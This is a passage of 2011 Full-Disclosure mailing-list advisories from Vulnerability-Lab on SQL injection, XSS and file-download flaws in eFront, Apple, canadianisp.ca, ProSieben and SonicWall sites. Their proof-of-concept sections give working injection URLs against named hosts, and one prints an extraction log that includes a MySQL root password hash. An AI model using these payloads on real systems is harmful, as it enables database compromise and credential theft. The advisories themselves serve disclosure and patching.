do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sparkasse Bank – Tricky Card Bug on ATM [ATM Adventure]
Title: == Sparkasse Bank – Tricky Card Bug on ATM [ATM Adventure] Date: = 2011-10-17 References: === Document: http://www.vulnerability-lab.com/resources/documents/295.pdf Article: http://www.vulnerability-lab.com/dev/?p=247 VL-ID: = 295 Status: Published Exploitation-Technique: === Report Severity: = High Details: In this paper a researcher called rem0ve explains a tricky bug in the card reader sensor of the sparkassen atm in europe. The video presentation was on the hack in the box malaysia (hack a week/day room) 2011-10-13 Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this document is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eFront Enterprise Edition v3.6.9 - SQL Injection Vulnerability
Title: == eFront Enterprise Edition v3.6.9 - SQL Injection Vulnerability Date: = 2011-10-07 References: === http://www.vulnerability-lab.com/get_content.php?id=230 VL-ID: = 230 Introduction: = Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html) Abstract: = An anonymous researcher of the vulnerability Lab Team discovered a critical SQL Injection vulnerability on eFront CMS v3.6.9 Report-Timeline: 2011-09-18: Vendor Notification 2011-09-21: Vendor Response/Feedback 2011-10-06: Vendor Fix/Patch 2011-10-07: Public or Non-Public Disclosure Status: Published Affected Products: == eFront Product: eLearning Enterprise Edition v3.6.9 Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected on eFronts CMS v.3.6.9! The bug allows an remote attacker to inject/execute own sql statements over the vulnerable param request. Successful exploitation of the bug can lead to dbms cms compromise. Vulnerable Module(s): [+] student section Vulnerable File(s): [+] student.php Vulnerable Param(s): [+] ?ctg=messagesfolder= Pictures: ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... PoC: http://xxx.net/enterprise/www/student.php?ctg=messagesfolder=7+/*!Union*/Select+1,2,3,4,5,6,version%28%29,8,9,10,11,12-- Full: (reproduce) http://demo.efrontlearning.net/enterprise/www/student.php?ctg=messagesfolder=64+/*!Union*/Select+1,2,3,4,5,6,password,8,9,10,11,12+from+users-- Solution: = 2011/10/10 v3.6.10 build 11944 - http://www.efrontlearning.net/download Risk: = The security risk of the remote sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Mohammed Abdelkader A. Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Apple Website - Non Persistent Cross Site Scripting Vulnerability
Title: == Apple Website - Non Persistent Cross Site Vulnerability Date: = 2011-10-07 References: === http://www.vulnerability-lab.com/get_content.php?id=289 VL-ID: = 289 Introduction: = Our communities are filled with thousands of Mac, iPod, iPhone and iPad users from around the world. Begin by finding the community focused on your product or topic. Browse the threads for answers, ask a question or help out by answering questions. Get an answer quickly. Like or reply to any post. You ll be notified by email if anyone replies to your posts. Ask the community and easily track responses. Help community members get the most out of their products. Get only the content you want in one place. (Copy of the Vendor Homepage: https://discussions.apple.com/static/apple/tutorial/welcome.html ) Abstract: = Vulnerability-Lab Team (Alexander F.) discovered a non-persistent input validation vulnerability on the famous Apple vendor website. Report-Timeline: 2011-10-05: Vendor Notification 2011-10-06: Vendor Response/Feedback 2011-10-07: Vendor Fix/Patch 2011-10-07: Public or Non-Public Disclosure Status: Published Affected Products: == Apple Website - 2011/Q3 Exploitation-Technique: === Remote Severity: = Medium Details: A non-persistent cross site scripting vulnerability is detected on the famous Apple vendor website portal. Successful exploitation of the vulnerability allows an attacker to hijack user/mod/admin sessions of the portal. Vulnerable Module(s): [+] Exception-Handling - We are Sorry Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with required user inter action. For demonstration or reproduce ... PoC: !-- BEGIN main body -- div id=jive-body-main !-- BEGIN main body column -- div id=jive-body-maincol-container div id=jive-body-maincol h1 class=apple-account-issue-reportedWe're sorry./h1 div id=apple-sso-error iframe src=http://www.vulnerability-lab.com; onload=alert(vulnerabilitylab) height=800px width=900px =[x] /divdiv id=apple-sso-home Return to a href=https://discussions.apple.com;Apple Support Communities/a. /div /div /div !-- END main body column -- /div !-- END main body -- /div div class=clear/div div class=boot/div /div!--/content-- /div!--/#main-- Reference(s): ../apple-sso-error.txt ../sso-error!home.jspa Risk: = The security risk of the reflective xss vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory - Alexander Fuchs (f0X23) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eFront Enterprise v3.6.9 - Arbitrary Download Vulnerability
Title: == eFront Enterprise v3.6.9 - Arbitrary Download Vulnerability Date: = 2011-10-08 References: === http://www.vulnerability-lab.com/get_content.php?id=290 http://www.vulnerability-lab.com/get_content.php?id=230 VL-ID: = 290 Introduction: = Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html) Abstract: = A Researcher of the Vulnerability Laboratory Team discovered a remote arbitrary download vulnerability on the eFronts Enterprise CMS v3.6.9. Report-Timeline: 2011-09-28: Vendor Notification 2011-09-29: Vendor Response/Feedback 2011-10-06: Vendor Fix/Patch 2011-10-08: Public or Non-Public Disclosure Status: Published Affected Products: == eFront Product: eLearning Enterprise Edition v3.6.9 Exploitation-Technique: === Remote Severity: = High Details: A remote arbitrary download vulnerability is detected on eFronts CMS v.3.6.9! The bug allows an remote attacker to read and even download files over the vulnerable param request. Successful exploitation of the bug can lead to read and download of important configuration files by trainers trainees. Vulnerable Module(s): [+] Administration, Trainee Trainer Section Vulnerable File(s): [+] view_file.php Vulnerable Param(s): [+] ?file= Picture(s): ../1.png ../2.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... PoC: http://demo.xxx.com/enterprise/www/view_file.php?file=/var/www/vhosts/demo/enterprise/www/administrator.php http://demo.xxx.com/enterprise/www/view_file.php?file=/var/www/vhosts/demo/enterprise/www/view_file.php Solution: = 2011-10-08 v3.6.10 build 11944 - http://www.efrontlearning.net/download Risk: = The security risk of the remote arbitrary download vulnerability is estimated as high. Credits: Vulnerability Research Laboratory - Chokri B.A (Meister) [http://www.vulnerability-lab.com/show.php?user=Chokri%20B.A.] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Full disclosure: American Express
Hey Andreas, read the following article its fresh and new ... http://www.vulnerability-lab.com/dev/ This is 4 real ^^ Am 06.10.2011 12:18, schrieb Andreas: Zitat von Carlos Alberto Lopez Perez clo...@igalia.com: American Express admins looks really worried by security At least they thought about the remote possibility of google indexing the admin panel, so they disabled it at https://www.americanexpress.com/robots.txt smart move :-) because RewriteCond is hardcore stuff _ ups, it's an ibm httpd server. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day Full disclosure: American Express
ack Am 06.10.2011 14:38, schrieb resea...@vulnerability-lab.com: Hey Andreas, read the following article its fresh and new ... http://www.vulnerability-lab.com/dev/ This is 4 real ^^ Am 06.10.2011 12:18, schrieb Andreas: Zitat von Carlos Alberto Lopez Perez clo...@igalia.com: American Express admins looks really worried by security At least they thought about the remote possibility of google indexing the admin panel, so they disabled it at https://www.americanexpress.com/robots.txt smart move :-) because RewriteCond is hardcore stuff _ ups, it's an ibm httpd server. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Canadian ISP Website - SQL Injection Vulnerability
Title: == Canadian ISP Website - SQL Injection Vulnerability Date: = 2011-09-23 VL-ID: = 282 Reference: == http://www.vulnerability-lab.com/get_content.php?id=282 Introduction: = Canadianisp.ca - Is a wholly owned project of Marc Bissonnette / InternAlysis. It was originally created as a joint venture with Bob Carrick of Carrick Solutions, with sole ownership transferring to Marc Bissonnette on February 16th, 2004. Canadianisp.ca is the only website that allows you to search for an Internet service provider (Dial-up, ISDN, DSL, Cable, Satellite, Point to Point, Wireless and Voice Over IP (VoIP)) anywhere in Canada. Customers can post reviews, and ISPs submit their own services. All for free. CanadianISP is also one of the most accurate and most up-to-date ISP lists on the net. There are many ISP lists out there, but the vast majority of them (as far as we have seen and we last searched and looked in April of 2011) are out of date, listing companies no longer in business, no longer providing connectivity or simply pages of ads with no relevance to the users search parameters. ISPs can submit and edit / update their own services at all times, free of charge. (Copy of the Vendor Homepage: www.canadianisp.ca/about.htm) Abstract: = Vulnerability-Lab Team discovered a critical remote SQL Injection vulnerability on the Canadian ISP main vendor website. Report-Timeline: 2011-09-24: Vendor Notification 2011-10-03: Vendor Response/Feedback 2011-10-04: Vendor Fix/Patch 2011-10-04: Public or Non-Public Disclosure Status: Published Affected Products: == Canadian ISP Website - 2011/Q2-3 Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected on canadians isp website. The bug allows remote attackers to inject/execute own sql statements/commands over a vulnerable applicataion parameter on the main web service. Successful exploitation of the remote sql injection vulnerability can result in database managemtn system compromise website manipulations. Vulnerable Module(s): [+] ispsearch.cgi Vulnerable Param(s): [+] ispid Pictures: ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers without user inter action. For demonstration or reproduce ... html headbody titleRemote SQL Injection PoC - CANADIAN ISP/title iframe src=http://www.canadianisp.ca/cgi-bin/ispsearch.cgi?f=ShowDetailispid=19+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,concat_ws%280x3a3a,user%28%29,database%28%29,version%28%29%29,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100, 101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134, 135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168, 169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202, 203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236, 237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270, 271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304, 305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338, 339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372, 373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406, 407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440, 441,442,443,444,445,446,447-- brbr /body/head /html Risk: = The security risk of the remote sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri B.A. (Me!ster) [TN] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential
[Full-disclosure] Prosieben Website - Multiple SQL Injection Vulnerabilities
Title: == Prosieben Web Services - Multiple SQL Injection Vulnerabilities Date: = 2011-09-26 VL-ID: = 284 Abstract: = The Vulnerability Lab Research Team discovered multiple remote SQL Injection vulnerabilities on prosiebens - tvtotal vendor website. Report-Timeline: 2011-09-01:Vendor Fix/Patch 2011-10-04:Public or Non-Public Disclosure [FULL RELEASE] Status: Unpublished Exploitation-Technique: === Remote Severity: = Critical Details: Multiple remote SQL Injection vulnerabilities are detected on Prosiebens Tvtotal vendor website. Remote attackers can inject/execute own sql statements over the vulnerable modules on the affected dbms. Successful exploitation can result in server database management system compromise. Vulnerable Module(s): [+] Player - Index [+] Videos Listing [+] Community Profiles Vulnerable Param(s): [+] ?list=tagtag=stefan_raabtagId= [+] ?contentId= [+] ?u= Pictures: ../1.png ../2.png ../ Proof of Concept: = The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... 1.1 URL:http://tvtotal.prosieben.de PATH:/tvtotal/videos/player/ File:index.html Para:?contentId= http://tvtotal.prosieben.de/tvtotal/videos/player/index.html?contentId=-42136+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31,32,33,34,35,36--+ 1.2 http://tvtotal.prosieben.de/tvtotal/suche/?query=;IFRAME SRC=javascript:alert('X4lt');/IFRAMEx=13y=18 2.1 URL:http://tvtotal.prosieben.de PATH:/tvtotal/videos/ File:index.html Para:?list=tagtag=stefan_raabtagId=' http://tvtotal.prosieben.de/tvtotal/videos/index.html?list=tagtag=stefan_raabtagId=18 and 1=2-- 3.1 URL:http://tvtotal.prosieben.de PATH:/tvtotal/community/forum/ File:account.php Para:?u=-1' http://tvtotal.prosieben.de/tvtotal/community/forum/account.php?u=-1 order by 1-- Risk: = The security risk of the sql injection vulnerabilities are estimated as critical. Credits: Vulnerability Research Laboratory Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab Comment: Thanks for the free tickets to tvtotal ;) by f0x -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SonicWall Viewpoint v6.0 SP2 - SQL Injection Vulnerability
Title: == SonicWall Viewpoint v6.0 SP2 - SQL Injection Vulnerability Date: = 2011-10-01 References: === http://www.vulnerability-lab.com/get_content.php?id=196 VL-ID: = 196 Introduction: = SonicWALL® ViewPoint™ ist ein benutzerfreundliches webbasiertes Reporting-Tool, das die Sicherheitsprodukte und -dienste von SonicWALL vollständig unterstützt und erweitert. Es kann flexibel als Software oder virtuelle Appliance implementiert werden. Umfassende Reporting-Funktionen geben Administratoren einen unmittelbaren Einblick in den Zustand, die Leistung und die Sicherheit ihres Netzwerks. Mithilfe der anpassbaren Übersichtsanzeige und einer Vielzahl von Verlaufsberichten unterstützt SonicWALL ViewPoint Unternehmen aller Größen dabei, Netzwerknutzung und Sicherheitsaktivitäten zu überwachen und die Webnutzung anzuzeigen. (Copy of the Vendor Homepage: http://www.sonicwall.com/de/Centralized_Management_and_Reporting.html) Abstract: = Vulnerability-Lab Team discovered a remote exploitable blind sql injection vulnerability on Sonicwalls Viewpoint v6.0 SP2. Report-Timeline: 2011-06-16: Vendor Notification 2011-09-21: Vendor Response/Feedback 2011-10-01: Vendor Fix/Patch 2011-10-02: Public or Non-Public Disclosure Status: Published Affected Products: == SonicWall Product: ViewPoint Application v6.0 SP2 Exploitation-Technique: === Remote Severity: = Critical Details: A remote sql injection vulnerability is detected on the famous Sonicwall Viewpoint Application v6.x. The vulnerability allows an attacker to inject/execute (pre-auth) own sql statements. The successfully exploitation of the vulnerability can lead to unauthorized database access. Notice: The file is not just located on viewpoint ;) Vulnerable Modules(SQL): [+] Schedule Reports (pre auth) Pictures: ../sql1.png ../sql2.png Example URL: https://gms.xxx.com/sgms/reports/scheduledreports/configure/scheduleProps.jsp?scheduleID= --- SQL Log --- select @@version = 5.0.83-enterprise-nt select user() = vpuser@localhost select @@datadir = C://GMSVP//MySQL//data// SELECT count(schema_name) FROM information_schema.schemata = 43 SELECT schema_name FROM information_schema.schemata limit 0,1 = information_schema SELECT schema_name FROM information_schema.schemata limit 1,1 = mysql SELECT schema_name FROM information_schema.schemata limit 2,1 = rawsyslogdb_20090905 SELECT schema_name FROM information_schema.schemata limit 3,1 = rawsyslogdb_20090906 SELECT schema_name FROM information_schema.schemata limit 4,1 = rawsyslogdb_20090907 SELECT schema_name FROM information_schema.schemata limit 10,1 = rawsyslogdb_20100223 SELECT schema_name FROM information_schema.schemata limit 20,1 = rawsyslogdb_20100305 SELECT schema_name FROM information_schema.schemata limit 30,1 = rawsyslogdb_20100315 SELECT schema_name FROM information_schema.schemata limit 37,1 = rawsyslogdb_20100322 SELECT schema_name FROM information_schema.schemata limit 39,1 = rawsyslogdb_20100324 SELECT schema_name FROM information_schema.schemata limit 40,1 = sgmsdb SELECT schema_name FROM information_schema.schemata limit 41,1 = sgmsdb_archive SELECT schema_name FROM information_schema.schemata limit 42,1 = test +--+ | Databases| +--+ | mysql| | rawsyslogdb_20090905 | | rawsyslogdb_20090906 | | rawsyslogdb_20090907 | | rawsyslogdb_20090926 | | rawsyslogdb_20090927 | | rawsyslogdb_20090928 | | rawsyslogdb_20090929 | | rawsyslogdb_20090930 | | rawsyslogdb_20100225 | | rawsyslogdb_20100226 | | rawsyslogdb_20100227 | | rawsyslogdb_20100228 | | rawsyslogdb_20100301 | | rawsyslogdb_20100302 | | rawsyslogdb_20100303 | | rawsyslogdb_20100304 | | rawsyslogdb_20100305 | | rawsyslogdb_20100306 | | rawsyslogdb_20100307 | | rawsyslogdb_20100308 | | rawsyslogdb_20100309 | | rawsyslogdb_20100310 | | rawsyslogdb_20100311 | | rawsyslogdb_20100312 | | rawsyslogdb_20100313 | | rawsyslogdb_20100314 | | rawsyslogdb_20100315 | | rawsyslogdb_20100316 | | rawsyslogdb_20100317 | | rawsyslogdb_20100318 | | rawsyslogdb_20100319 | | rawsyslogdb_20100320 | | rawsyslogdb_20100321 | | rawsyslogdb_20100322 | | rawsyslogdb_20100323 | | rawsyslogdb_20100324 | | rawsyslogdb_20100325 | | rawsyslogdb_20100326 | | sgmsdb | | sgmsdb_archive | | test | +--+ SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 0,1 = localhost:root:*50F99C5E85A49EF12C936A17C978C626B9D2BA98 SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 1,1 = 127.0.0.1:root: SELECT concat(host,0x3a,user,0x3a,password) FROM mysql.user limit 2,1 =